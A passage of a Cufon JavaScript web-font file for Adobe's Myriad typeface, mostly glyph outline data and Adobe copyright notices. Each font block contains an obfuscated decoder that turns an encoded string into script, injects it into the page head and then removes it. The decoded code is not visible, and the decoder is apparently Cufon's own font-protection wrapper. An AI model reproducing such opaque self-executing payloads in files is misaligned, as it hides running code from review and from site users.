c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+75-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("*,{EIMRyiz2o*sKc7M=k;s!e=,gXT*-qRpC~_}nx8z%S{iIJ7(Q)rNY4KM9Ga:|+?oBH#WUyE[j`b>cA2]ZWX,X2%[RE{M2o%[TWiz_9{8A+SUyNI[8z{EK}Jj{]zs)9ie?j(8#Jzy`#Q=_8IsaJX98yxsKci4{iX!XK(M{2JK2HSKE)C[_Cix7X(,b#-s?|I}~jTY)cSEqr8yxU%gxHq,eHpnb*-}bJ-U{TneyY~x_!%YasSnyyR8eAqekN-9RHI,Ky*sXN*}#aCnk+J!EN-9k+I!EH-M#KIM7yis#9CzXo{Nb9IgKHigq2(jycizSGSNbBiUyB%N)Zp97j7EHo*nAGCUaN{z#+SzTBI[TrSM8J-MRBI%#+I[RrI,rBJj~aTs2a-9_KJj~GI,2YS%_aI[`oi,2U7,brIzxa*z{BJN)cin#+pW+|i}K9z[RIi8E7C%;Ii8E2*})a")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":205,"face":{"font-family":"myriad","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 8 3 3 4 3 2 2 4","ascent":"288","descent":"-72","x-height":"4","bbox":"-14 -270 324 90","underline-thickness":"18","underline-position":"-27","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright 1992-1997 Adobe Systems Incorporated.  All Rights Reserved.
 * 
 * Trademark:
 * Myriad is a trademark of Adobe Systems Incorporated.
 * 
 * Description:
 * Myriad is an Adobe Originals typeface designed by Robert Slimbach and Carol
 * Twombly in 1992. Myriad is a sans serif design that works well as a text face as
 * well as providing flexibility for filling display needs. Myriad Web has been
 * optimized for onscreen use.
 * 
 * Manufacturer:
 * Adobe Systems Incorporated
 * 
 * Designer:
 * Robert Slimbach and Carol Twombly
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"57,3v-36,0,-51,-25,-43,-62r39,-193r29,0r-20,104v26,-47,94,-35,94,26v0,59,-41,125,-99,125xm63,-20v36,2,63,-59,62,-96v0,-24,-9,-37,-26,-37v-45,0,-57,64,-57,112v0,14,7,21,21,21","w":164,"k":{"y":3,"w":2,"v":3,".":11,",":13}},{"d":"40,-247r59,0r-55,287r-59,0r4,-19r35,0r47,-248r-35,0","w":97},{"d":"142,0r-30,0r-29,-102v-9,17,-30,51,-62,102r-33,0r83,-124r-35,-119r31,0v15,51,23,84,26,98v21,-41,38,-63,60,-98r33,0r-81,119","w":162,"k":{"y":6,"u":4,"e":6,"a":6,"Y":-7,"X":-6,"W":-8,"V":-8,"T":-7,"Q":9,"O":9,"G":9,"C":9}},{"d":"8,0r46,-243r29,0r-23,118r96,-118r35,0r-90,105r48,138r-32,0r-39,-118r-24,25r-18,93r-28,0","w":163,"k":{"y":12,"w":10,"v":12,"u":4,"o":6,"l":-2,"i":-2,"h":-2,"e":6,"a":2,"W":-5,"Q":6,"O":6,"G":6,"C":6,"A":-4}},{"d":"48,-245r31,0r24,50r-20,0","w":128},{"d":"40,-66v0,40,32,54,66,38r1,23v-46,22,-97,-2,-97,-57v0,-65,54,-135,124,-110r-8,24v-50,-23,-86,36,-86,82","w":128,"k":{"y":-4,"t":-4,"o":4,"e":4,"d":4,"a":5,".":3,",":5}},{"d":"35,0r-29,0r33,-174r29,0xm44,-224v-2,-24,38,-31,38,-4v0,12,-9,22,-21,22v-10,0,-17,-8,-17,-18","w":74},{"d":"26,-86r0,-19r165,-87r0,26r-137,71r137,70r0,25","w":214},{"d":"63,-147v21,-38,93,-44,90,10v-2,46,-17,93,-24,137r-29,0v7,-44,22,-81,22,-130v0,-33,-34,-26,-50,-5v-25,34,-25,89,-37,135r-29,0r48,-252r29,0","w":167,"k":{"v":2}},{"d":"105,14r-23,0r-63,-260r23,0","w":109},{"d":"60,-249v45,99,7,233,-54,292r-25,0v60,-61,98,-192,56,-292r23,0","w":97},{"d":"73,0v-37,13,-61,-11,-52,-55r19,-97r-23,0r4,-22r23,0r6,-31r31,-11r-8,42r37,0r-4,22r-37,0v-6,39,-16,73,-20,115v-1,15,15,17,26,14","w":100,"k":{"y":-5,"w":-5,"v":-5,"o":3,"g":3,"e":3,"d":3,"c":3,".":2,",":4}},{"w":59,"k":{"Y":12,"W":10,"V":10,"T":12}},{"d":"156,-76v-19,2,-72,-30,-90,-30v-12,0,-20,10,-20,29r-21,0v-1,-32,14,-50,42,-52v17,-1,72,30,89,30v12,0,18,-9,18,-28r21,0v1,34,-11,48,-39,51","w":214},{"d":"105,-81v0,-40,-30,-49,-70,-44r32,-109r92,0r-5,26r-68,0r-18,59v40,-1,66,23,68,62v3,66,-71,111,-132,81r8,-25v40,25,93,-6,93,-50"},{"d":"42,0r41,-216r-57,0r5,-27r143,0r-5,27r-57,0r-41,216r-29,0","w":147,"k":{"}":-16,"z":16,"y":17,"w":16,"u":18,"s":20,"r":18,"o":23,"m":18,"i":2,"h":3,"e":22,"a":24,"]":-16,"Y":-13,"X":-10,"W":-12,"V":-13,"T":-10,"Q":9,"O":9,"G":9,"C":9,"A":20,";":13,":":11,".":25,",":24,")":-16}},{"d":"20,-174r31,0v9,21,14,46,23,66v11,-17,25,-39,44,-66r33,0r-66,85r33,89r-31,0v-14,-40,-22,-64,-23,-70v-8,14,-23,37,-46,70r-33,0r68,-89","w":137,"k":{"y":-7,"w":-5,"v":-5,"t":-7,"q":5,"o":5,"e":5,"d":5,"c":5}},{"d":"54,-243r29,0r-46,243r-29,0","w":78,"k":{"z":-2,"t":-2,"f":-2}},{"d":"62,-243r25,117v21,-41,46,-78,69,-117r33,0r-93,141r-19,102r-29,0r19,-101r-36,-142r31,0","w":163,"k":{"}":-15,"v":11,"u":18,"t":8,"q":28,"o":26,"l":2,"i":3,"e":27,"d":28,"a":29,"]":-15,"Y":-9,"X":-5,"W":-10,"V":-11,"T":-10,"Q":6,"O":6,"G":6,"C":6,"A":27,";":12,":":10,".":32,",":33,")":-16}},{"d":"-9,0r4,-18r140,-199r-94,0r5,-26r131,0r-4,21r-139,196r102,0r-5,26r-140,0","w":157,"k":{"w":3,"u":3,"o":4,"e":5,"a":3,"Q":6,"O":6,"G":6,"C":6,"A":-2}},{"d":"9,-55v0,-64,51,-143,119,-116r16,-81r29,0r-37,194v-4,19,-7,38,-8,58r-26,0r3,-31v-25,53,-96,41,-96,-24xm123,-147v-47,-30,-84,43,-84,88v0,44,33,47,54,22v21,-26,21,-72,30,-110","w":164,"k":{".":8,",":10}},{"d":"42,43v-46,-98,-6,-236,54,-292r25,0v-60,60,-96,190,-56,292r-23,0","w":97,"k":{"Y":-15,"W":-17,"V":-17,"T":-17,"J":-4}},{"d":"-18,53v29,-12,54,-32,61,-64r-25,-163r30,0v10,82,15,128,16,139r57,-139r31,0v-47,86,-72,215,-160,252","w":141,"k":{"w":-5,"v":-6,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,"a":5,";":-3,":":-4,".":15,",":17}},{"d":"100,0r22,-130v-1,-34,-34,-25,-50,-5v-25,33,-25,89,-37,135r-29,0v20,-106,30,-164,31,-174r26,0v0,9,-5,22,-3,30v22,-42,93,-48,93,8v0,47,-17,92,-24,136r-29,0","w":167,"k":{"v":2}},{"d":"157,-171v-20,110,-23,89,-26,171r-27,0v-1,-6,4,-24,3,-39v-22,57,-98,57,-98,-11v0,-77,62,-151,148,-121xm125,-152v-53,-15,-86,50,-86,95v-1,46,33,43,53,15v19,-28,24,-71,33,-110","w":163},{"d":"139,-20v-34,40,-124,28,-118,-39v6,-66,22,-122,32,-184r29,0r-29,153v-8,34,-2,69,33,68v36,-1,47,-30,54,-67r29,-154r29,0v-18,73,-19,175,-59,223","w":192,"k":{"z":2,"x":3,"f":-4,"A":6}},{"d":"-7,-27v37,13,58,-7,65,-45r33,-171r29,0v-19,74,-19,176,-57,229v-12,17,-51,21,-76,13","w":112,"k":{"}":-7,"y":-3,"]":-7,")":-7}},{"w":59,"k":{"Y":12,"W":10,"V":10,"T":12}},{"d":"41,-247v74,-7,35,80,27,116v0,12,8,18,23,18r-4,19v-71,2,8,142,-101,134v3,-6,-1,-21,10,-19v57,-5,8,-109,67,-125v-41,-10,1,-77,0,-102v0,-16,-8,-22,-25,-21","w":97},{"d":"113,0v-7,-17,9,-117,-38,-105r-18,0r-20,105r-29,0r45,-239v51,-13,115,-3,114,50v-1,35,-25,64,-54,73v15,6,24,23,25,52v2,37,3,58,5,64r-30,0xm81,-129v53,9,83,-91,17,-91v-9,0,-15,1,-20,2r-17,89r20,0","w":167,"k":{"y":-3,"t":-5,"i":-3,"h":-3,"e":2,"Y":6,"X":-3,"V":3,"T":5,"O":-2,"A":-3}},{"d":"9,-55v0,-75,68,-151,148,-112r-45,237r-29,0r20,-100v-25,51,-94,40,-94,-25xm125,-149v-50,-23,-86,42,-86,90v0,46,34,46,54,19v21,-27,23,-70,32,-109","w":164,"k":{".":8,",":4}},{"d":"35,0r-29,0r48,-252r28,0r-28,154r66,-76r35,0r-68,72r43,102r-31,0r-34,-85r-17,18","w":145,"k":{"y":-3,"w":-3,"u":2,"r":-2,"p":-2,"o":5,"n":-2,"m":-2,"l":-2,"i":-2,"g":5,"e":5,"a":4}},{"d":"69,3v-69,-2,-67,-99,-39,-152v24,-48,62,-85,124,-88r-4,25v-50,2,-87,40,-100,85v31,-44,97,-25,97,34v0,45,-33,98,-78,96xm87,-129v-30,4,-47,24,-47,63v0,25,9,45,31,46v42,2,72,-103,16,-109"},{"d":"194,-155v0,102,-68,178,-186,153r45,-238v75,-15,141,9,141,85xm41,-25v81,15,122,-54,122,-130v0,-52,-35,-72,-85,-63","w":196,"k":{"y":-5,"u":-3,"o":-3,"e":-2,"Y":11,"W":3,"V":4,".":13,",":13}},{"d":"97,-177v38,0,55,27,55,64v1,53,-34,116,-86,116v-36,0,-56,-28,-56,-65v0,-53,36,-115,87,-115xm93,-154v-32,-1,-54,56,-54,90v0,24,9,43,30,44v32,1,53,-60,53,-94v0,-22,-9,-39,-29,-40","w":161,"k":{"z":3,"y":3,"x":5,"w":3,"v":3,".":10,",":11}},{"d":"202,-177v35,0,40,35,33,72r-20,105r-29,0v7,-44,22,-84,22,-130v0,-33,-33,-26,-48,-6v-22,31,-25,92,-36,136r-28,0v7,-44,22,-84,22,-130v0,-32,-31,-26,-47,-5v-25,33,-25,89,-37,135r-28,0v18,-96,28,-153,31,-174r25,0r-3,30v20,-38,82,-50,88,1v15,-23,33,-34,55,-34","w":253,"k":{"v":2}},{"d":"6,42r-23,3v14,-27,26,-56,35,-86r35,-4v-15,35,-30,64,-47,87","w":73,"k":{" ":18}},{"d":"106,-30v-23,40,-94,49,-92,-10v1,-46,16,-91,23,-134r29,0v-7,44,-20,82,-22,129v-1,33,35,26,49,7v25,-33,25,-90,37,-136r29,0r-30,174r-26,0","w":166,"k":{".":4,",":5}},{"d":"211,0r-27,0r30,-207r-2,0v-30,79,-62,134,-96,205r-21,0r-19,-205r-48,207r-27,0r61,-243r35,0r14,138v3,26,1,48,4,59r92,-197r36,0","w":246,"k":{"j":-4,"i":-2}},{"d":"9,-55v0,-76,68,-151,148,-112v-27,88,-5,239,-113,240v-18,0,-33,-3,-44,-10r8,-23v42,25,89,-2,91,-46v1,-8,6,-20,4,-26v-24,52,-94,39,-94,-23xm125,-149v-50,-24,-85,40,-85,87v0,47,34,48,54,21v20,-27,22,-70,31,-108","w":163,"k":{".":8,",":7}},{"d":"35,0r-29,0r48,-252r29,0","w":74},{"d":"127,-246v49,0,72,38,71,89v-2,77,-34,159,-111,160v-47,1,-74,-41,-72,-88v2,-77,35,-159,112,-161xm122,-220v-53,0,-75,78,-77,134v-1,36,13,64,46,64v50,0,74,-79,76,-134v1,-40,-11,-64,-45,-64","w":200,"k":{"y":-5,"w":-5,"v":-5,"t":-5,"s":-2,"q":-3,"o":-3,"n":-2,"m":-2,"l":-2,"k":-2,"j":-2,"g":-3,"f":-6,"e":-3,"d":-3,"c":-3,"b":-3,"Y":12,"X":8,"W":2,"V":3,"T":11,"A":4,".":10,",":12}},{"d":"71,-100v53,30,27,103,-34,103v-15,0,-27,-4,-38,-11r8,-22v23,16,63,13,63,-18v0,-35,-53,-42,-48,-76v-3,-43,53,-66,91,-46r-8,22v-27,-18,-69,5,-49,35v3,4,8,9,15,13","w":118,"k":{".":4,",":5}},{"d":"44,-234r126,0v0,31,-38,82,-60,119r-68,115r-32,0r124,-208r-95,0"},{"d":"108,-238v36,0,51,30,51,70v-3,76,-25,171,-94,171v-38,0,-52,-32,-52,-75v0,-70,34,-166,95,-166xm105,-213v-40,0,-64,97,-63,143v1,27,4,47,26,49v46,-8,61,-95,61,-148v0,-25,-4,-44,-24,-44"},{"d":"42,-248r30,0r-22,87r-19,0","w":53},{"d":"34,0r-20,0r22,-71r-27,0r4,-20r29,0r16,-54r-28,0r3,-20r31,0r21,-69r20,0r-21,69r30,0r21,-69r20,0r-21,69r27,0r-4,20r-29,0r-16,54r28,0r-3,20r-31,0r-22,71r-20,0r22,-71r-30,0xm62,-91r30,0r16,-54r-30,0"},{"d":"58,5r-21,0r171,-244r21,0xm63,-95v-26,0,-41,-21,-41,-49v0,-43,25,-94,64,-94v25,0,39,22,39,48v0,44,-23,95,-62,95xm66,-113v22,-1,36,-50,36,-76v0,-20,-6,-30,-19,-30v-24,0,-38,48,-37,75v0,21,7,31,20,31xm183,2v-27,0,-40,-22,-40,-50v-1,-42,24,-92,63,-92v26,0,40,20,40,47v0,44,-23,95,-63,95xm186,-16v22,-1,38,-50,37,-76v0,-20,-6,-30,-19,-30v-25,0,-38,46,-37,74v0,21,6,32,19,32","w":257},{"d":"134,-203v-1,54,-65,75,-67,135r-27,0v-6,-53,58,-85,63,-130v3,-28,-38,-29,-56,-15r-4,-22v33,-23,92,-13,91,32xm45,-41v12,0,19,9,19,21v0,12,-10,24,-22,23v-12,0,-19,-9,-19,-20v0,-11,10,-24,22,-24","w":124},{"d":"105,-238v73,3,59,105,32,159v-24,49,-61,79,-119,82r3,-25v50,-2,87,-42,99,-85v-32,39,-94,20,-94,-36v0,-45,37,-97,79,-95xm84,-108v31,-3,46,-23,46,-64v0,-24,-7,-42,-28,-42v-27,0,-48,38,-47,67v0,21,9,41,29,39"},{"d":"5,14r-24,0r136,-260r24,0","w":109},{"d":"54,-243r29,0r-20,103r89,0r19,-103r30,0r-47,243r-29,0r21,-113r-88,0r-21,113r-29,0","w":195},{"d":"44,-174v9,-59,33,-91,89,-78r-6,23v-35,-9,-45,10,-54,55r36,0r-5,22r-36,0r-28,152r-30,0r29,-152r-22,0r4,-22r23,0","w":92,"k":{"}":-27,"t":-3,"]":-27,";":-10,":":-10,".":13,",":14,")":-27,"'":-9,"\"":-9}},{"d":"-10,0v2,-20,1,-18,17,-37r91,-113r-74,0r5,-24r108,0r-4,20r-104,130r81,0r-5,24r-115,0","w":128,"k":{"y":-5,"o":3,"e":3,"d":3,"c":3}},{"d":"143,-67v0,78,-136,99,-136,14v0,-33,19,-54,52,-73v-50,-37,-14,-115,44,-112v29,1,53,19,53,50v0,29,-19,46,-44,65v21,14,31,33,31,56xm101,-216v-41,0,-52,67,-9,81v20,-10,37,-26,37,-50v0,-21,-10,-31,-28,-31xm71,-19v25,0,44,-22,43,-47v0,-21,-11,-36,-33,-47v-22,9,-42,29,-43,57v0,21,12,37,33,37"},{"d":"15,-107r83,0r-5,23r-82,0","w":105},{"d":"31,-146v-1,-25,42,-34,41,-3v0,13,-9,25,-22,24v-12,0,-18,-10,-19,-21xm6,-17v-2,-25,41,-34,41,-4v0,13,-9,25,-22,24v-12,0,-18,-10,-19,-20","w":73,"k":{" ":12}},{"d":"142,-196v-34,-28,-97,6,-67,45v15,19,66,44,59,76v1,40,-25,65,-61,69r-7,36r-21,0r7,-36v-16,-1,-31,-6,-42,-14r9,-22v39,33,109,-2,79,-49v-14,-23,-64,-48,-60,-77v4,-31,25,-59,58,-61r7,-34r20,0r-6,34v14,1,26,4,35,11"},{"d":"31,-270r23,0r0,360r-23,0r0,-360","w":72},{"d":"98,-192r22,0r0,85r81,0r0,21r-81,0r0,86r-22,0r0,-86r-80,0r0,-21r80,0r0,-85","w":214},{"d":"6,-18v-2,-27,42,-33,42,-3v2,27,-42,33,-42,3","w":73,"k":{" ":19}},{"d":"61,40v-74,8,-35,-81,-27,-116v0,-12,-7,-18,-22,-18r3,-19v70,-2,-7,-141,101,-134v-3,7,1,22,-11,20v-56,5,-8,109,-66,124v41,10,1,77,1,103v0,16,8,22,24,21","w":97,"k":{"Y":-13,"W":-15,"V":-15,"T":-16,"J":-3}},{"d":"82,0r-31,0r-20,-243r31,0r12,208v27,-71,61,-139,91,-208r32,0","w":172,"k":{"}":-15,"y":4,"u":8,"r":6,"o":14,"e":13,"a":13,"]":-15,"S":-3,"Q":2,"O":2,"G":2,"C":2,"A":19,";":10,":":8,".":28,",":30,")":-16}},{"d":"107,0r-27,0r12,-64r-88,0r4,-21r113,-149r31,0r-28,146r28,0r-4,24r-28,0xm38,-89v17,3,40,0,59,1v12,-61,20,-99,24,-113r-2,0v-22,42,-54,75,-81,112"},{"d":"21,-174r29,0r4,142v18,-50,43,-95,64,-142r24,0r9,142v17,-58,37,-91,57,-142r30,0r-81,174r-26,0r-9,-138v-21,57,-39,87,-62,138r-27,0","w":227,"k":{"y":-6,"v":-6,"s":-2,"q":3,"o":4,"e":3,"d":3,"c":3,"a":4,";":-2,":":-4,".":15,",":17}},{"d":"116,-246r21,12r-38,45r53,-8r-5,25v-15,0,-37,-9,-49,-5r28,42r-22,12r-18,-49r-27,50r-20,-13r38,-44r-51,7r4,-25v15,2,34,8,48,7r-28,-44r24,-11v6,15,9,34,17,48","w":141},{"d":"6,0r30,-174r25,0v0,9,-3,25,-2,35v16,-28,28,-39,55,-38r-6,30v-61,-1,-60,90,-73,147r-29,0","w":103,"k":{"z":-3,"y":-7,"x":-5,"w":-8,"v":-8,"t":-7,"q":5,"o":5,"g":5,"f":-7,"e":5,"d":5,"c":5,"a":7,";":-2,":":-4,".":18,",":19}},{"d":"49,-69r-25,0r29,-174r33,0xm28,-41v12,0,19,9,19,21v2,25,-42,33,-41,3v0,-11,10,-24,22,-24","w":79},{"d":"194,-68r-25,0r-60,-139r-60,139r-24,0r74,-166r21,0","w":214},{"d":"127,-246v120,0,70,220,-6,241v18,6,36,10,53,14r-13,24v-33,-10,-55,-21,-80,-30v-42,-2,-67,-41,-66,-88v2,-79,35,-161,112,-161xm123,-220v-54,0,-76,79,-78,135v-2,36,14,63,46,63v53,0,77,-80,77,-135v0,-42,-15,-63,-45,-63","w":200,"k":{"Y":12,"X":4,"W":2,"V":4,"T":10}},{"d":"19,-174r30,0v5,46,3,99,12,141v16,-46,43,-96,62,-141r31,0r-87,174r-28,0","w":143,"k":{"y":-6,"w":-6,"q":5,"o":5,"e":5,"d":5,"c":5,"a":5,";":-3,":":-5,".":18,",":21}},{"d":"8,0r46,-243r107,0r-5,26r-78,0r-16,82r73,0r-5,26r-72,0r-21,109r-29,0","w":145,"k":{"y":6,"u":8,"r":7,"o":8,"l":5,"i":6,"e":7,"a":11,"A":20,";":7,":":5,".":33,",":31}},{"d":"202,-121r-183,0r0,-21r183,0r0,21xm202,-51r-183,0r0,-22r183,0r0,22","w":214},{"d":"8,0r46,-243r29,0r-41,217r81,0r-5,26r-110,0","w":138,"k":{"y":11,"w":14,"u":5,"o":5,"j":-2,"e":6,"a":3,"Y":32,"W":22,"V":27,"U":14,"T":29,"Q":15,"O":15,"G":15,"C":15,"A":-4}},{"d":"47,-94v0,54,38,83,86,66r14,-75r-39,0r4,-24r68,0r-23,119v-71,29,-141,-5,-141,-83v0,-99,75,-178,177,-146r-10,26v-79,-31,-136,40,-136,117","w":190,"k":{"y":3,"e":-2,"a":-2}},{"d":"50,-180v0,-67,105,-95,106,-20v1,29,-22,51,-59,73v16,30,29,52,38,67v13,-19,23,-43,32,-72r27,0v-12,38,-27,69,-47,92r27,40r-34,0v-5,-6,-9,-14,-14,-22v-37,42,-121,31,-121,-33v0,-34,21,-58,57,-81v-8,-16,-12,-31,-12,-44xm108,-225v-33,1,-37,52,-21,79v28,-15,43,-33,43,-53v0,-17,-8,-26,-22,-26xm35,-60v-2,45,56,52,80,20v-20,-34,-34,-60,-43,-77v-25,16,-37,35,-37,57","w":195},{"d":"152,-74v1,63,-74,85,-144,72r45,-238v52,-11,112,-2,112,49v0,33,-25,53,-50,63v23,7,36,27,37,54xm79,-140v53,9,83,-82,18,-81v-10,0,-16,1,-19,2r-15,79r16,0xm121,-76v0,-34,-26,-45,-63,-42r-18,94v41,9,81,-11,81,-52","w":167,"k":{"o":-2,"e":-3,"W":3,"V":3,"T":8,".":6,",":5}},{"d":"172,-213v-75,-29,-126,44,-126,118v0,65,44,84,95,65r3,24v-65,28,-129,-11,-129,-84v0,-96,70,-180,166,-148","w":164,"k":{"z":-3,"y":9,"u":5,"o":6,"e":5,"a":4,"Q":10,"O":10,"G":10,"C":10}},{"d":"96,-177v27,0,44,17,44,42v0,39,-34,59,-101,59v-7,54,36,67,75,45r4,22v-47,27,-108,9,-108,-54v0,-51,36,-114,86,-114xm112,-134v-1,-27,-35,-24,-49,-5v-8,11,-15,23,-20,40v46,0,69,-11,69,-35","w":143,"k":{".":5,",":7}},{"d":"34,0r-26,0r46,-243r30,0r39,132v7,22,13,45,17,69v8,-80,23,-130,35,-201r26,0r-46,243r-28,0v-18,-63,-46,-137,-56,-203","w":196},{"d":"93,-135v68,39,37,138,-43,138v-21,0,-37,-4,-49,-13r10,-25v41,32,115,-6,82,-57v-15,-23,-68,-51,-62,-83v-3,-56,69,-90,117,-60r-9,24v-39,-27,-99,9,-71,53v5,7,12,16,25,23","w":146,"k":{"y":5,"w":3,"v":5,"q":-4,"o":-3,"i":-2,"e":-3,"a":-3}},{"d":"152,-183v-7,76,-45,96,-108,157r85,0r-4,26r-126,0r4,-19v73,-76,107,-84,119,-159v7,-40,-47,-41,-72,-20r-6,-22v39,-33,114,-20,108,37"},{"d":"32,-146v-1,-25,42,-34,41,-3v0,13,-9,25,-22,24v-12,0,-18,-10,-19,-21xm6,42r-23,3v14,-27,26,-56,35,-86r35,-4v-15,36,-31,65,-47,87","w":73,"k":{" ":10}},{"d":"137,-139r-5,25r-74,0r-16,88r83,0r-5,26r-112,0r46,-243r107,0r-5,26r-78,0r-15,78r74,0","w":148,"k":{"z":-2,"y":5,"w":5,"v":4,"u":4,"t":3,"q":4,"p":2,"o":4,"j":-2,"g":3,"e":3,"d":3,"c":4,"b":2,"a":3,"Y":-3,"W":-3,"V":-4,".":3,",":5}},{"d":"-19,27r180,0r-4,18r-180,0","w":180},{"d":"155,-121v0,67,-51,149,-121,117r-14,74r-29,0r45,-244r26,0r-4,30v26,-49,97,-43,97,23xm39,-28v49,34,86,-45,86,-90v0,-43,-35,-42,-55,-16v-19,25,-23,69,-31,106","w":164,"k":{"z":3,"y":3,"w":2,".":10,",":11}},{"d":"37,-105v0,76,68,114,132,81r5,14v-72,39,-161,-8,-156,-94v5,-79,46,-141,123,-143v54,-2,90,42,90,96v1,49,-19,92,-60,94v-17,1,-22,-12,-25,-29v-17,41,-79,39,-79,-13v0,-55,54,-107,113,-82r-15,90v0,12,3,18,11,18v24,-3,36,-42,36,-74v0,-50,-25,-84,-74,-84v-60,0,-101,60,-101,126xm156,-167v-40,-12,-66,30,-66,67v0,32,27,30,42,11v16,-20,17,-50,24,-78","w":235},{"d":"168,-184v-2,59,-50,96,-113,86r-18,98r-29,0r45,-240v54,-11,117,-2,115,56xm60,-122v45,8,77,-20,79,-60v1,-33,-29,-43,-61,-36","w":162,"k":{"y":-5,"u":4,"t":-5,"s":3,"r":3,"o":7,"n":3,"e":7,"a":7,"A":21,";":5,":":4,".":45,",":48}},{"d":"62,40r-58,0r54,-287r59,0r-4,20r-35,0r-47,248r35,0","w":97,"k":{"Y":-13,"W":-14,"V":-14,"T":-15,"J":-3}},{"d":"41,-248r30,0r-22,87r-19,0xm94,-248r29,0r-21,87r-19,0","w":103},{"d":"196,-106r0,21r-165,85r0,-25r140,-71r-140,-71r0,-25","w":214},{"d":"99,-128v67,28,26,131,-50,131v-19,0,-34,-4,-45,-11r9,-24v38,24,91,2,90,-42v0,-29,-21,-43,-53,-41r4,-23v32,2,61,-17,62,-46v2,-34,-44,-33,-66,-18r-4,-23v38,-25,102,-13,101,36v0,30,-23,53,-48,61"},{"d":"41,-174r29,0r-33,173v-11,57,-21,78,-77,73r3,-23v31,6,40,-15,44,-43xm45,-224v-2,-24,38,-31,38,-4v0,12,-9,22,-21,22v-10,0,-17,-8,-17,-18","w":74,"k":{".":4,",":5}},{"d":"70,0r-30,0r-5,-243r30,0r1,143v1,12,-3,37,-2,63v23,-69,56,-139,83,-206r30,0r2,140v1,28,-3,52,-1,66v25,-83,50,-132,79,-206r30,0r-102,243r-30,0r-2,-201v-28,84,-52,127,-83,201","w":265,"k":{"}":-13,"y":2,"u":8,"r":6,"o":11,"m":6,"i":3,"e":11,"d":11,"a":11,"]":-13,"T":-8,"A":18,";":8,":":6,".":21,",":25,")":-14}},{"d":"123,-74r-68,0r-34,74r-30,0r113,-243r34,0r20,243r-29,0xm64,-97r58,0r-8,-116","w":179,"k":{"z":-5,"y":9,"x":-5,"w":10,"v":10,"u":2,"r":-2,"q":3,"o":3,"j":-3,"i":-2,"g":3,"f":3,"e":4,"d":3,"c":4,"b":2,"Y":24,"W":16,"V":21,"U":9,"T":24,"Q":8,"O":8,"G":8,"C":8}},{"d":"57,0r38,-204r-41,21r-2,-23v25,-10,39,-31,78,-28r-44,234r-29,0"}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+381-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("Py(%p=cFHodgP:Lk3=r5jyjdY&c%(=dgY&T5HoMA(N[l6RF76L%6^&v`HUJWYrhf3:vOcNM@^NLH(:G1p=rN^LJ%aevGax%^Eol&Myd+bxNc(&J#EREhT5aL#RLEbFG=]`8+s7M[P51kN`M{PAjGYLr&M`%aM5(:K&Ns2RjkMNdhKrvpY:jOa&fYKU?7bAchpyLFP:j7P^Jf#U_lEe%7bA_lpe%hb=JLp=3FH:JA#ojg(71ApxLhHxad]{FkHo6W671>HRF>Y78ZsA3{3%hgPU[W#Rf7(oJl6oT>p&TG6=NEb=c>pYJlp&cGpyG>E{KfT:df_v:e?ryxjTPbacs#KM^U2NoY6(HpE3]*8G7`QL=AWf.!l+g>hJ5RF%&{@1zk[dOZbAMLE{KWpyd`6YMfp&@gHydR3y1Gpo2fPo(>E78kHUJls5l!H^LAo&cpHN%3#YvpHN%dP^8f")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":159,"face":{"font-family":"myriad","font-weight":400,"font-style":"italic","font-stretch":"condensed","units-per-em":"360","panose-1":"2 11 5 6 3 4 3 9 2 4","ascent":"288","descent":"-72","x-height":"3","bbox":"-40 -270 287 90","underline-thickness":"18","underline-position":"-27","slope":"-11","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright 1992-1997 Adobe Systems Incorporated.  All Rights Reserved.
 * 
 * Trademark:
 * Myriad is a trademark of Adobe Systems Incorporated.
 * 
 * Description:
 * Myriad is an Adobe Originals typeface designed by Robert Slimbach and Carol
 * Twombly in 1992. Myriad is a sans serif design that works well as a text face as
 * well as providing flexibility for filling display needs. Myriad Web has been
 * optimized for onscreen use.
 * 
 * Manufacturer:
 * Adobe Systems Incorporated
 * 
 * Designer:
 * Robert Slimbach and Carol Twombly
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 */
